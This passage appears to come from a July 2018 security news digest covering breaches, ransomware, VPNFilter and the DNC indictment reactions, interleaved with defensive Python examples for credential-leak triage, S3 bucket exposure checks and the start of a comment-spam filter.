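    """Parse the constructed tab-separated dump format:
    email<TAB>password<TAB>file1|file2|...  (lines starting with # are comments)."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split("\t")
        if len(parts) < 2:
            continue  # malformed line: skip rather than guess
        email, password = parts[0].strip().lower(), parts[1]
        listing = parts[2].split("|") if len(parts) > 2 else []
        records.append(LeakedRecord(email, password, tuple(f for f in listing if f)))
    return records


def overlap_with_prior_breaches(records, previously_breached):
    """Fraction of distinct emails in the dump already seen in earlier breaches.
    A high value is the signature of credential stuffing rather than a breach
    of the service itself (Hunt's analysis of the Mega file found 98%)."""
    emails = {r.email for r in records}
    if not emails:
        return 0.0
    return len(emails & {e.lower() for e in previously_breached}) / len(emails)


def classify_leak(overlap, threshold=0.8):
    """Assumed cut-off: at or above the threshold we treat it as stuffing."""
    return "credential stuffing" if overlap >= threshold else "possible direct breach"


def accounts_to_reset(records):
    """Accounts with a non-empty file listing were actually entered by the
    attacker: they need a forced password reset and session revocation."""
    return sorted({r.email for r in records if r.files})


def suspicious_logins(login_events, home_country, leak_seen_at):
    """Flag logins after the leak surfaced that come from a country other than
    the account's usual one. login_events: (email, timestamp, ip, country)."""
    flagged = []
    for email, ts, ip, country in login_events:
        if ts < leak_seen_at:
            continue
        usual = home_country.get(email.lower())
        if usual is not None and country != usual:
            flagged.append((email.lower(), ip, country))
    return flagged


# Constructed sample data (addresses and IPs are documentation ranges).
SAMPLE_DUMP = """# email\tpassword\tfile listing
alice@example.com\tsummer2013\tphotos/IMG_001.jpg|docs/cv.pdf
bob@example.com\tqwerty123\t
carol@example.com\tletmein\tbackup.zip
dave@example.com\thunter2\tnotes.txt|taxes.pdf
erin@example.com\tpassw0rd\t
"""
KNOWN_BREACHED = {"alice@example.com", "bob@example.com",
                  "carol@example.com", "dave@example.com"}
HOME_COUNTRY = {"alice@example.com": "US", "carol@example.com": "DE",
                "dave@example.com": "US"}
LEAK_SEEN_AT = datetime(2018, 7, 18, 11, 0)
SAMPLE_LOGINS = [
    ("alice@example.com", datetime(2018, 7, 10, 9, 0), "198.51.100.7", "RO"),  # before leak
    ("alice@example.com", datetime(2018, 7, 19, 3, 0), "198.51.100.7", "RO"),
    ("carol@example.com", datetime(2018, 7, 20, 1, 0), "203.0.113.9", "DE"),
    ("dave@example.com", datetime(2018, 7, 21, 2, 0), "192.0.2.33", "BR"),
]


def triage():
    records = parse_dump(SAMPLE_DUMP)
    overlap = overlap_with_prior_breaches(records, KNOWN_BREACHED)
    return {
        "records": len(records),
        "overlap": overlap,
        "verdict": classify_leak(overlap),
        "reset": accounts_to_reset(records),
        "suspicious": suspicious_logins(SAMPLE_LOGINS, HOME_COUNTRY, LEAK_SEEN_AT),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(key, value)
```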

“One of the accounts in the file contained file listings for what appeared to describe child abuse content. Given the nature of the account’s content, ZDNet informed the authorities.” continues ZDNet.

The illegal content was uploaded years earlier, suggesting that the account owner stored it himself, which excludes any recent third-party involvement.

“Mega has zero tolerance for child sexual abuse materials,” said Hall. “Any reports result in links being deactivated immediately, the user’s account closed and the details provided to the authorities.”

“Mega can’t act as censor by examining content as it is encrypted at the user’s device before being transferred to Mega,” he said. “As well as it being technically impossible, it is also practically infeasible for Mega and other major cloud storage providers, with 100s of files being uploaded each second.”


‘IT system issue’ caused cancellation of British Airways flights at Heathrow
20.7.2018 securityaffairs Security

British Airways canceled flights at Heathrow due to an ‘IT system issue,’ the incident occurred on Wednesday and affected thousands of passengers.
The problem had severe repercussions on the air traffic, many passengers also had their flights delayed.

“On one of the busiest days of the summer, British Airways cancelled dozens of flights to and from Heathrow, affecting at least 7,000 passengers

Problems began for BA when the control tower was closed for around 35 minutes on Wednesday afternoon when a fire alarm was triggered. Landings and take-offs were stopped.” reported The Independent.

“Then an IT issue emerged which caused further disruption for BA and other airlines. Hundreds of flights were delayed, and some evening outbound departures were canceled. Around 3,000 British Airways passengers were stranded overnight abroad.”
The IT problem affected 7,000 passengers and more than 3,000 were forced to spend the night abroad attempting to fly back to London.

Officially, the problem originated with the IT supplier Amadeus, whose system issue caused the disruption to the flights; British Airways confirmed this in an official statement on its Twitter account. Reportedly, the British Airways passengers stranded at the airport were advised to ‘look for overnight accommodation or seek alternative travel arrangements’.

It seems that the IT problems also affected the company’s online check-in service.


“We are aware that British Airways is currently experiencing an issue which is impacting their ability to provide boarding passes to some passengers. We will be working with the airline to support their efforts to resolve the issue as quickly as possible.” stated a spokesperson for Heathrow.

The problems began a few hours after a fire alarm at Heathrow’s air traffic control tower was triggered, causing delays for several airlines. According to the airport, this event is not related to the British Airways issue, while the airline glitch had “impacted operation of the airfield for a short while”.

“The vast majority of customers affected by the supplier system issue and the temporary closure of Heathrow airport’s air traffic control tower are now en route to their destinations.”

“The supplier, Amadeus, resolved their system issue last night, and our schedule is now operating as normal,” said a spokesperson for British Airways.

“We have apologised to our customers for disruption to their travel plans.”

British Airways experienced another technical problem with its IT systems in May 2017.


HR Services Firm ComplyRight Suffers Data Breach
20.7.2018 securityweek Incident

Florida-based HR services provider ComplyRight revealed recently that its tax reporting platform was involved in a cybersecurity incident that resulted in the exposure of personal information.

ComplyRight learned on May 22 that someone had gained unauthorized access to its web-based tax reporting platform, which is used by various websites to prepare W-2, 1099 and other tax-related forms.

ComplyRight, which is owned by marketing company Taylor Corporation, provides tax solutions through efile4Biz. The efile4Biz website claims its services are used by 76,000 organizations.

However, ComplyRight says the data breach has only impacted less than 10 percent of the individuals whose tax forms have been prepared on its platform.


An investigation conducted by the company showed that the attacker gained access to the names, addresses, phone numbers, email addresses, and Social Security numbers of individual tax form recipients. However, ComplyRight has not been able to determine whether the compromised information was actually downloaded by the unauthorized party, and says it has not seen any evidence of fraud as a direct result of the incident.

Affected individuals are being notified by mail and offered 12 months of free credit monitoring and identity theft protection services.

Security blogger Brian Krebs reported that some of the recipients of these letters were unaware of ComplyRight. The company clarified that its platform is used by various tax form preparation websites whose customers are impacted by the breach and many may not be familiar with the ComplyRight brand.

According to Krebs, the attackers had access to ComplyRight systems between April 20, 2018 and May 22, 2018.

“Upon learning of the issue, we disabled the platform, remediated the issue on the website, and commenced a prompt and thorough investigation using external cybersecurity professionals to determine who was potentially affected and what information was accessed or viewed,” ComplyRight stated. “Although the investigation determined the information was accessed and/or viewed, it could not confirm if the information was downloaded or otherwise acquired by an unauthorized user.”

ComplyRight is not the only HR services firm hit by a data breach recently. Australia-based PageUp reported last month that hackers may have gained access to names, contact information, usernames, and password hashes. PageUp says it has 2.6 million active users across over 190 countries.


Ransomware Attack Hits Health Firm LabCorp
20.7.2018 securityweek Ransomware

Burlington, North Carolina-based LabCorp took some of its systems offline last weekend after discovering that some had been infected by ransomware.

LabCorp, a company that provides “diagnostic, drug development and technology-enabled solutions for more than 115 million patient encounters per year,” serves hundreds of thousands of customers nationwide and processes tests on more than 2.5 million patient specimens per week.

With revenues that topped $10 billion last year, the health company operates a network of more than 1,900 patient service centers (PSCs) nationally and employs about 60,000 people.

In an 8-K filing with the U.S. Securities and Exchange Commission on Monday, the company revealed that, over the weekend of July 14, it detected suspicious activity on its network and decided to take some systems offline to contain the activity.

“The activity was subsequently determined to be a new variant of ransomware,” the health firm said, responding to a SecurityWeek inquiry on the attack.

“LabCorp promptly took certain systems offline as part of its comprehensive response to contain and remove the ransomware from its system. This has temporarily affected some test processing and customer access to test results,” the company said.

As of Monday, testing operations had already resumed and the firm was working on bringing additional systems and functions online.

“Work has been ongoing to restore full system functionality as quickly as possible, testing operations have substantially resumed, and we are working to restore additional systems and functions over the next several days,” the company told SecurityWeek.

The ransomware, LabCorp says, only impacted its Diagnostics systems but did not affect Covance Drug Development systems. The health firm also revealed it has “engaged outside security experts and is working with authorities, including law enforcement.”

For the time being, the “investigation has found no evidence of theft or misuse of data,” the company said.


Industry Reactions to U.S. Indicting 12 Russians for DNC Hack
20.7.2018 securityweek BigBrothers

The U.S. last week indicted 12 Russian intelligence officers over their alleged role in a hacking operation targeting the Democratic National Committee (DNC) and Hillary Clinton’s 2016 presidential campaign.

The charges, part of special counsel Robert Mueller’s investigation into Russia’s attempt to interfere in the presidential election, were announced just days before President Donald Trump met his Russian counterpart, Vladimir Putin.

Industry professionals have commented on the charges, their impact, the possible threat actors responsible for the operation, and how these types of attacks can be avoided.

And the feedback begins...

John Hultquist, Director of Intelligence Analysis, FireEye:

“While we had already been aware of much of the information covered in the indictment, there were several interesting insights into the organizations that lie behind the intrusion operators we track. In particular, the document indicates that more than one GRU unit was involved in efforts to undermine the elections. The first of these units, Unit 26165, resembles APT28, the operator who we originally suspected of carrying out the DNC incident. The second of these two units, Unit 74455, is implicated in incidents affecting election systems.

We have been actively tracking an actor we believe was tied to those incidents, and have found some connection between those incidents and others, such as efforts to target the 2017 French elections, and disruptive attacks on the 2018 Olympics, as well as other incidents. Ultimately, though much of their activity remains opaque, we believe GRU organizations have been behind many of the most aggressive incidents in recent memory, including the economically devastating NotPetya attacks and attacks on Ukraine’s grid.”

John Gomez, CEO, Sensato:

“When you consider all that is going on and developing with the Russian hackers, it is important to note that we are very much in the embryonic stages of learning what, specifically, occurred. As more and more comes to light, I suspect we will come to appreciate the high level of sophistication that was employed to carry out the attacks. This attack was planned far in advance. It relied upon the coordination of various assets, including the development of fake personas, the recruitment of cybercriminals, monitoring news feeds, and establishing on-the-ground assets that could be plied for information and intelligence. The attackers timed the attacks to shake confidence and cause confusion.

Although the Russian hackers targeted our government, the real lesson here is that this level of sophistication is not isolated to the Russian hackers identified in the U.S Federal indictment. Rather, we are seeing that other criminal organizations, nation states, and even terrorists are employing the same level of sophistication in their operations. This development with Russia simply highlights what many of us have known all along: Attackers, regardless of motivation, have matured their tactics, techniques, and procedures. They’re innovating at a pace that far outstrips the defenses that most organizations have erected. Even basic attacks, such as phishing, are not the same approaches used a few years ago.

We may be appalled, shocked, and even outraged. Yet, maybe the biggest lesson is that despite all efforts, we failed at protecting one of our most treasured assets--the democratic process. What is more appalling is that many will continue to believe that the adversaries our IT organizations faced just a few years ago are the same adversaries our IT organizations face today. Hopefully, what has occurred with Russia will be a wake-up call, not only at the national level, but within our own organizations. If Russia can manipulate an electoral process, what could they and other, highly focused, well-funded cyber attackers do to our economy, our healthcare organizations, and other critical infrastructure systems like transportation or communications?”

Richard Ford, Chief Scientist, Forcepoint:

“We shouldn’t be distracted by talks of how they did this or why but instead – how will the international community respond to these types of asymmetric attacks that impact the very core of our democratic process? While an indictment is a nice gesture, it has little real consequences beyond drawing yet more attention to the issue.

Cybersecurity knows no borders, and so it is relatively easy for a nation state – or even an enthusiastic group of individuals – to launch attacks from the safety of their own country that can be impactful but carry very little personal risk. How we decide to treat these offensive cyber operations is one of the most pressing questions of our time, and those questions cannot be answered by governments alone. Attacks often involve third-party infrastructure, and vulnerabilities in this infrastructure have to be addressed by those in the commercial world.

It’s time for us as an international community to truly come together and determine not only what constitutes acceptable behavior online at the nation state level, but what checks and balances can be meaningfully put in place to those states that refuse to adhere to these agreed upon practices.”

Ross Rustici, Head of Intelligence Research, Cybereason:

"This further confirms the links already exposed from the indictments related to the social media influence campaigns. The concentrated effort of the Russian state to influence the election is undeniable. The most surprising thing about this is not only the relative ease of the intrusions but the widespread campaign perpetrated by the GRU. This only serves to reinforce the dramatic changes that the internet has brought to influence operations around the world. The ease with which intelligence agencies can have a direct influence in the information age is something that they could only dream of during the Cold War."

Kevin Mitnick, Chief Hacking Officer, KnowBe4:

“After reading the Russian indictment I was surprised to see that the Russians use the same exact methods we use to test our clients' security controls. Our security engineers have never failed to get in when we can use social engineering (phishing, etc.) during an assessment.

The biggest takeaway was that spearphishing is *still* the easiest way the bad guys get in. Why the DNC didn't use Multi-Factor Authentication is beyond me. I believe it is the lack of security awareness training that made it easy for the Russians to hack our election.”

Leo Taddeo, CISO, Cyxtera:

“The indictment teaches cyber security professionals several important lessons. Many legacy security solutions, even when used in combination, simply aren’t designed to mitigate the risks presented by today's adversaries.

A user-centric, context-aware model is non-negotiable – Access controls that require only user name and password are effectively useless. Given the seemingly unstoppable effectiveness of spearphishing, enterprises must assume that one or more of their users has had their credentials compromised. An effective security solution must do more than just verify a user name and password. It must be able to tell if the context of a remote connection is suspicious, such as if it originates from an unusual location or time of day, or from a device with no antivirus software installed. It should also be able to ask for additional authentication steps like one-time passwords (OTP), adjust user permissions on the fly and ultimately block access according to the level of risk. To accomplish this, organizations must adopt a user-centric context-aware model that is built on the principle of least privilege.

Authenticate first, connect second – The indictment specifically calls out that the conspirators conducted scanning on the network IP protocols. The fundamental reason for this vulnerability is that TCP/IP – which was originally designed to operate in an environment where the user community knew and trusted each other – is based on implicit trust, with a “connect first, authenticate second” approach. In today’s hyperconnected and highly adversarial threat landscape, this approach puts organizations at risk. Alternate access control technologies, such as Software-Defined Perimeter (SDP), are built on an “authenticate first, connect second” approach and ensure that only authorized users can connect to network resources. This reduces the attack surface and significantly improves security. With Software Defined Perimeter, all resources are invisible to the dangerous reconnaissance techniques outlined in the indictment.

Manage the risks of third-party access – The indictment reveals the conspirators hacked into the DNC’s computers through their access to the DCCC network. Then, they installed and managed different types of malware to explore the DNC network and steal documents. This highlights the need for organizations to better manage the risks of third-party access. By using a solution that leverages the Software-Defined Perimeter (SDP) security framework, organizations can ensure that all endpoints attempting to access a given infrastructure are authenticated and authorized prior to accessing any resources on the network. This not only applies the principle of least privilege to the network, it also reduces the attack surface area by hiding network resources from unauthorized or unauthenticated users.”


Robocalling Firm Exposes U.S. Voter Records
20.7.2018 securityweek BigBrothers

A publicly accessible Amazon Web Services S3 bucket belonging to a political autodial firm was exposing hundreds of thousands of United States voter records.

Discovered by Kromtech Security's Bob Diachenko, the misconfigured data repository is part of robocalling company Robocent’s cloud storage and had already been indexed by the searchable database GrayhatWarfare, which currently lists over 48,000 open S3 buckets.

The Virginia Beach-based political autodial firm claims to have over 10 years of combined autodial experience and to be able to “reach thousands of voters instantly.”

“Our powerful dialer can make thousands of calls a minute, ensuring large calls always meet the deadline,” Robocent notes on its website.

The company’s publicly accessible storage had 2594 listed files, including audio files with pre-recorded political messages for robocalls (*.mp3, *.wav).

More importantly, the Amazon S3 bucket contained a large amount of voter data (in the form of *.csv, *.xls files): full name, suffix, prefix; phone numbers (cell and landlines); address with house, street, city, state, zip, precinct; age and birth year; and gender.

Other voter information found in the cloud storage included affiliation provided by state, or inferred based on voting trends/history; jurisdiction breakdown based on district, zip code, precinct, county, state; and demographics based on ethnicity, language, and education, Diachenko reveals.

Many of the files in the S3 bucket were aggregated from outside data firms such as NationalBuilder.

In addition to making political robocalls starting at 1¢ per dial, Robocent also provides voter data at only 3¢ per record. The company also advertises on its website the data points it collects.

“We provide voter files for every need, whether it be for a new robocall or simply to update records for door knocking. Our simple request process allows users to choose exactly who to target with no minimum order,” Robocent says on its website.

According to Diachenko, the company quickly secured the S3 bucket and file access after being responsibly alerted to the issue.
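A defender-side check for the kind of misconfiguration described above, added here as an example (not Kromtech's or Robocent's code): it evaluates a bucket's ACL grants and bucket policy, in the dict and JSON shapes that boto3's get_bucket_acl and get_bucket_policy return, against constructed sample data; no AWS call is made.

```python
import json

# Canonical URIs AWS uses for the two "everyone" groups in S3 ACLs.
ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTHENTICATED_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
PUBLIC_GROUPS = {ALL_USERS, AUTHENTICATED_USERS}
READ_PERMISSIONS = {"READ", "FULL_CONTROL"}
# Policy actions that let a principal list or fetch the bucket's objects.
READ_ACTIONS = {"*", "s3:*", "s3:getobject", "s3:listbucket"}


def public_acl_grants(acl):
    """Return (group URI, permission) for every ACL grant that gives one of the
    public groups read access. `acl` has the dict shape of get_bucket_acl()."""
    exposed = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if (grantee.get("Type") == "Group"
                and grantee.get("URI") in PUBLIC_GROUPS
                and grant.get("Permission") in READ_PERMISSIONS):
            exposed.append((grantee["URI"], grant["Permission"]))
    return exposed


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _principal_is_everyone(principal):
    """True for Principal "*" or {"AWS": "*"} (also when "*" sits in a list)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def public_policy_statements(policy):
    """Split Allow statements that grant a read action to everyone into those
    with no Condition (public) and those with a Condition (e.g. a source VPC
    or IP restriction), which may still be safe and are left for review."""
    unconditional, conditional = [], []
    for st in policy.get("Statement", []):
        if st.get("Effect") != "Allow":
            continue
        if not _principal_is_everyone(st.get("Principal")):
            continue
        actions = {a.lower() for a in _as_list(st.get("Action", []))}
        if not actions & READ_ACTIONS:
            continue
        sid = st.get("Sid", "<no Sid>")
        (conditional if st.get("Condition") else unconditional).append(sid)
    return unconditional, conditional


def assess_bucket(acl, policy_json):
    """Combine both sources of exposure into one verdict. policy_json is the
    "Policy" string from get_bucket_policy(), or None when the bucket has no
    policy (boto3 raises NoSuchBucketPolicy in that case)."""
    policy = json.loads(policy_json) if policy_json else {}
    grants = public_acl_grants(acl)
    unconditional, conditional = public_policy_statements(policy)
    return {
        "public": bool(grants or unconditional),
        "acl_grants": grants,
        "policy_statements": unconditional,
        "needs_review": conditional,
    }


# Constructed sample data: an exposed bucket (public-read ACL plus a public
# GetObject policy statement) and the ACL of the same bucket after hardening.
EXPOSED_ACL = {"Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner-id-placeholder"},
     "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
]}
EXPOSED_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"},
    {"Sid": "VpcOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::example-bucket/*",
     "Condition": {"StringEquals": {"aws:SourceVpc": "vpc-placeholder"}}},
]})
PRIVATE_ACL = {"Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner-id-placeholder"},
     "Permission": "FULL_CONTROL"},
]}

if __name__ == "__main__":
    print(assess_bucket(EXPOSED_ACL, EXPOSED_POLICY))
    print(assess_bucket(PRIVATE_ACL, None))
```

Remediation is removing the offending grant or statement (boto3's put_bucket_acl / delete_bucket_policy) and enabling S3 Block Public Access (put_public_access_block), a feature AWS added later in 2018.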

“We're a small shop (I'm the only developer) so keeping track of everything can be tough,” Diachenko was told.

Over the past several years, there were numerous incidents involving voter databases, including one reported by Diachenko in December last year, where an improperly secured MongoDB database exposed the information of the entire voting population of California: it contained 19,264,123 records.


Cisco fixes critical and high severity flaws in Policy Suite and SD-WAN products
19.7.2018 securityaffairs Vulnerebility

Cisco has found over a dozen critical and high severity vulnerabilities in its Policy Suite, SD-WAN, WebEx and Nexus products.
The tech giant has reported to customers four critical vulnerabilities affecting the Policy Suite.

The flaws tracked as CVE-2018-0374, CVE-2018-0375, CVE-2018-0376, and CVE-2018-0377 have been discovered during internal testing.

Two of these flaws could be exploited by a remote unauthenticated attacker to access the Policy Builder interface and the Open Systems Gateway initiative (OSGi) interface.

Access to the Policy Builder interface could allow an attacker to make changes to existing repositories and create new ones, while access to the OSGi interface could allow an attacker to access or change any file accessible by the OSGi process.

An unauthenticated attacker could also modify any data contained in the Policy Builder database.

“A vulnerability in the Policy Builder database of Cisco Policy Suite could allow an unauthenticated, remote attacker to connect directly to the Policy Builder database.” reads the security advisory published by Cisco.

“The vulnerability is due to a lack of authentication. An attacker could exploit this vulnerability by connecting directly to the Policy Builder database. A successful exploit could allow the attacker to access and change any data in the Policy Builder database.”

Cisco also warned of the presence in the Cluster Manager of Policy Suite of a root account with default, static credentials. A remote attacker can exploit the vulnerability to access the account and execute arbitrary commands with root privileges.

Cisco also warned of the presence of seven flaws in the SD-WAN solution; one of them affects the Zero Touch Provisioning service and could be exploited by an unauthenticated attacker to trigger a denial-of-service (DoS) condition.

Other SD-WAN vulnerabilities could allow an authenticated attacker to overwrite arbitrary files on the underlying operating system, and execute arbitrary commands with vmanage or root privileges.

Cisco also reported a high severity DoS vulnerability that affects Nexus 9000 series Fabric switches, the issue resides in the implementation of the DHCPv6 feature.

Cisco fixed all the vulnerabilities and confirmed that none of them have been exploited in attacks in the wild.


Timehop provides additional details on the recent security breach
19.7.2018 securityaffairs Incident

Timehop recently announced that it suffered a data breach affecting 21 million user accounts. The company now shares additional details about the incident.
The Timehop service aims to help people find new ways to connect with each other by analyzing past activities. Earlier this month, the company revealed that one or more malicious hackers gained unauthorized access to a database storing usernames, phone numbers, email addresses, and social media access tokens for all users.

The security breach also exposed access tokens used by Timehop to access other social networks such as Twitter, Facebook, and Instagram. The tokens have been quickly revoked and currently don’t work.

Wednesday the company provided an update on the incident adding that further info was exposed, including dates of birth, genders, and country codes.


“Earlier reports of “up to 21 million emails” were correct. However we now provide the following breakdown of Personally Identifiable Information (PII) that was breached, and the combinations contained in records” reads the update provided by the company.

| Type of personal data combination | # of breached records | # of breached GDPR records |
|---|---|---|
| Name, email, phone, DOB | 3.3 million | 174,000 |
| Name, email address, phone | 3.4 million | 181,000 |
| Name, email address, DOB | 13.6 million | 2.2 million |
| Name, phone number, DOB | 3.6 million | 189,000 |
| Name and email address | 18.6 million | 2.9 million |
| Name and phone number | 3.7 million | 198,000 |
| Name and DOB | 14.8 million | 2.5 million |
| Name total | 20.4 million | 3.8 million |
| DOB total | 15.5 million | 2.6 million |
| Email addresses total | 18.6 million | 2.9 million |
| Gender designation total | 9.2 million | 2.6 million |
| Phone numbers total | 4.9 million | 243,000 |

The company provided a detailed analysis of the exposed info, specifically for the affected PII records, in compliance with the newly introduced GDPR.

According to the company, hackers first breached its systems on December 19, 2017, using an employee’s credentials for the company’s cloud computing environment.

The attackers accessed the systems through an IP address in the Netherlands.

In a first phase, the hacker conducted reconnaissance; at the time, the compromised environment did not store any personal information. In early April, the company moved personal information into the compromised database, and the attackers found it only on June 22.

On July 4, the hacker exfiltrated the data and changed its password. The company noticed the activity in nearly 24 hours.

“They did not immediately suspect a security incident for two reasons that in retrospect are learning moments,” reads the technical analysis published by Timehop. “First, because it was a holiday and no engineers were in the office, he considered it likely that another engineer had been doing maintenance and changed the password. Second, password anomalies of a similar nature had been observed in past outage. He made the decision that the event would be examined the next day, when engineers returned to the office.”


Facebook faces £500,000 fine in the U.K. over Cambridge Analytica scandal
19.7.2018 securityaffairs Social

Facebook has been fined £500,000 ($664,000) in the U.K. for its conduct in the Cambridge Analytica privacy scandal.
Facebook has been fined £500,000 in the U.K., the maximum fine allowed by the UK’s Data Protection Act 1998, for failing to protect users’ personal information.


Political consultancy firm Cambridge Analytica improperly collected data of 87 million Facebook users and misused it.

“Today’s progress report gives details of some of the organisations and individuals under investigation, as well as enforcement actions so far.

This includes the ICO’s intention to fine Facebook a maximum £500,000 for two breaches of the Data Protection Act 1998.” reads the announcement published by the UK Information Commissioner’s Office.

“Facebook, with Cambridge Analytica, has been the focus of the investigation since February when evidence emerged that an app had been used to harvest the data of 50 million Facebook users across the world. This is now estimated at 87 million.

The ICO’s investigation concluded that Facebook contravened the law by failing to safeguard people’s information. It also found that the company failed to be transparent about how people’s data was harvested by others.”

This is the first possible financial punishment that Facebook is facing for the Cambridge Analytica scandal.

“A significant finding of the ICO investigation is the conclusion that Facebook has not been sufficiently transparent to enable users to understand how and why they might be targeted by a political party or campaign,” reads ICO’s report.

Obviously, the financial penalty is negligible compared to the gains of the social networking giant, but it is a strong message to all companies, which must properly manage users’ personal information in compliance with the new General Data Protection Regulation (GDPR).

What would have happened if the regulation had already been in force at the time of disclosure?

Under the GDPR, the penalties allowed by the new privacy regulation are much greater: fines can reach up to 4% of global turnover, which in Facebook’s case is estimated at $1.9 billion.

“Facebook has failed to provide the kind of protections they are required to under the Data Protection Act.” Elizabeth Denham, the UK’s Information Commissioner said. “People cannot have control over their own data if they don’t know or understand how it is being used. That’s why greater and genuine transparency about the use of data analytics is vital.”

Facebook still has a chance to respond to the ICO’s Notice of Intent before a final decision on the fine is made.

“In line with our approach, we have served Facebook with a Notice setting out the detail of our areas of concern and invited their representations on these and any action we propose,” concludes the ICO update on the investigation published today by Information Commissioner Elizabeth Denham.

“Their representations are due later this month, and we have taken no final view on the merits of the case at this time. We will consider carefully any representations Facebook may wish to make before finalising our views,”


Ukraine’s SBU Security Service reportedly stopped VPNFilter attack at chlorine station
19.7.2018 securityaffairs CyberWar

Ukraine’s SBU Security Service reportedly stopped a VPNFilter attack at a chlorine station; the malware infected network equipment at the facility, which supplies water treatment and sewage plants.
According to the Interfax-Ukraine media outlet, VPNFilter hit the LLC Aulska station in Auly (Dnipropetrovsk region); according to the experts, the malware aimed at disrupting operations at the chlorine station.

“Specialists of the cyber security service established minutes after [the incident] that the enterprise’s process control system and system for detecting signs of emergencies had deliberately been infected by the VPNFilter computer virus originating from Russia. The continuation of the cyber attack could have led to a breakdown in technological processes and a possible accident,” the SBU said on its Facebook page on Wednesday.

VPNFilter is a multi-stage, modular strain of malware with a wide range of capabilities for both cyber espionage and sabotage purposes.

According to the experts at Fortinet who analyzed the malware, VPNFilter operates in the following three stages:

Stage 1 implements a persistence mechanism and redundancy; it allows the malware to survive a reboot.
Stage 2 includes data exfiltration, command execution, file collection, and device management. A self-destruct module is present only in some versions.
Stage 3 includes multiple modules that perform different tasks. At the time, researchers had identified only three modules:
A packet sniffer for traffic analysis and potential data exfiltration.
Monitoring of the MODBUS SCADA protocol.
Communication with obfuscated addresses via Tor.
The main concern is the self-destruct mode, which could cause severe damage across all infected devices simultaneously, a feature that could potentially result in a widespread Internet outage over a targeted geographic region.

Technical analysis of the code revealed many similarities with another nation-state malware, BlackEnergy, which was specifically designed to target ICS/SCADA systems and has been attributed to Russian threat actors.

Another similarity is the geographic distribution of the infections: both BlackEnergy and VPNFilter infected a large number of devices in Ukraine.

VPNFilter malware

According to the experts, many infected devices have been discovered in Ukraine, and their number in the country continues to increase. On May 8, Talos researchers observed a spike in VPNFilter infection activity; most infections were in Ukraine, and the majority of compromised devices contacted a separate stage 2 C2 infrastructure at the IP 46.151.209[.]33.

The experts discovered the VPNFilter malware had infected devices manufactured by Linksys, MikroTik, Netgear, QNAP, and TP-Link.

At the time of the first discovery, the US Justice Department seized a domain used as part of the command and control infrastructure; its press release explicitly referred to the Russian APT group (APT28, also known as Pawn Storm, Sandworm, Fancy Bear and the Sofacy Group) as the operator behind the huge botnet.

“The Justice Department today announced an effort to disrupt a global botnet of hundreds of thousands of infected home and office (SOHO) routers and other networked devices under the control of a group of actors known as the “Sofacy Group” (also known as “apt28,” “sandworm,” “x-agent,” “pawn storm,” “fancy bear” and “sednit”),” reads the press release published by the DoJ.

“The SBU said its agents together with a telecoms provider and workers of the station managed to prevent a potential man-made disaster, adding Russia special forces were behind cyber attacks with the same virus on the public and private sectors in May 2018,” concluded Interfax-Ukraine.


Spambot targets WordPress sites in World Cup-themed spam scam
19.7.2018 securityaffairs Spam

Imperva observed a spambot targeting WordPress sites that aims to trick victims into clicking on links to sites offering betting services on the FIFA World Cup.
Security experts from Imperva recently observed a spike in spam activity directed at WordPress websites; the attackers aimed at tricking victims into clicking on links to sites offering betting services on the 2018 FIFA World Cup games.
Imperva monitored the activity of a botnet used to post meaningless text messages, generated from a template, to the comment sections of blogs, news articles, and other websites that allow people to comment.

“Turns out the attack was launched by a botnet and implemented in the form of comment SPAM – meaningless, generic text generated from a template and posted in the comment sections of blogs, news articles etc; linking to pay-per-click commercial or suspicious sites looking to scam you or phish for your passwords.” reads the report published Imperva.

The spambot was used to post comments to the same Uniform Resource Identifier (URI) across different WordPress sites indiscriminately, without regard for whether the site has a comments section or is affected by known exploitable issues.

The comments are generated from a template that has been known since at least 2013. The template allows the operators to automatically create slightly different versions of the same message for use in spam campaigns.

“Our analysis found that the top 10 links advertised by the botnet lead to World Cup betting sites. Interestingly, eight of the top advertised sites contained links to the same betting site, hinting that they might be connected in a way.” continues Imperva.

World Cup betting sites

“We found that the botnet advertised over 1000 unique URLs, most of them appear multiple times. In many cases, the botnet used different techniques such as URL redirection and URL-shortening services to mask the true destination of the advertised link.”

According to the experts, the spambot is still small: it is composed of just 1,200 unique IPs, with up to 700 unique IPs active per day. The experts discovered that the botnet has also been using URL shortening, URL redirection, and other techniques to mask the landing sites of the links advertised in its spam messages.

In the weeks before the World Cup, the spambot was being used in remote code execution attacks and other non-spam attacks on WordPress sites.

Spambot World Cup

Just after the beginning of the 2018 World Cup, the botnet activity was focused on comment spam, a circumstance that suggests the malicious infrastructure is available for hire.

“A possible explanation is that the botnet is for hire. The malicious activity we’ve seen at first was either paid for or simply the botnet’s attempt to grow itself. Then, it was hired by these betting sites to advertise them and increase their SEO.” continues the analysis.

Comment spam is a well-known activity in the threat landscape; the most common countermeasure is to blacklist the IPs originating the spam messages and also the URLs they advertise.

WordPress also has several plug-ins that can defeat this nuisance.

“Although comment SPAM has been with us for more than a decade — and doesn’t seem like it’s going away anytime soon — there are numerous solutions ranging from dedicated plugins that block comments that look SPAMmy, to WAF services.” concluded Imperva.
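The countermeasures the article describes (blocklisting originating IPs and advertised URLs, and catching template-generated text) can be combined into a simple moderation filter. The block below is an added example, not Imperva's code or a WordPress plugin: the blocklist entries, the shortener list and the sample comments are constructed for illustration, and the near-duplicate check uses word-shingle Jaccard similarity, which goes slightly beyond the article by also catching the "slightly different versions of the same message" that a spam template produces.

```python
import re
from urllib.parse import urlparse

# Constructed blocklists a site operator might maintain (RFC 5737 documentation
# addresses and a .test domain; none of these are real spam sources).
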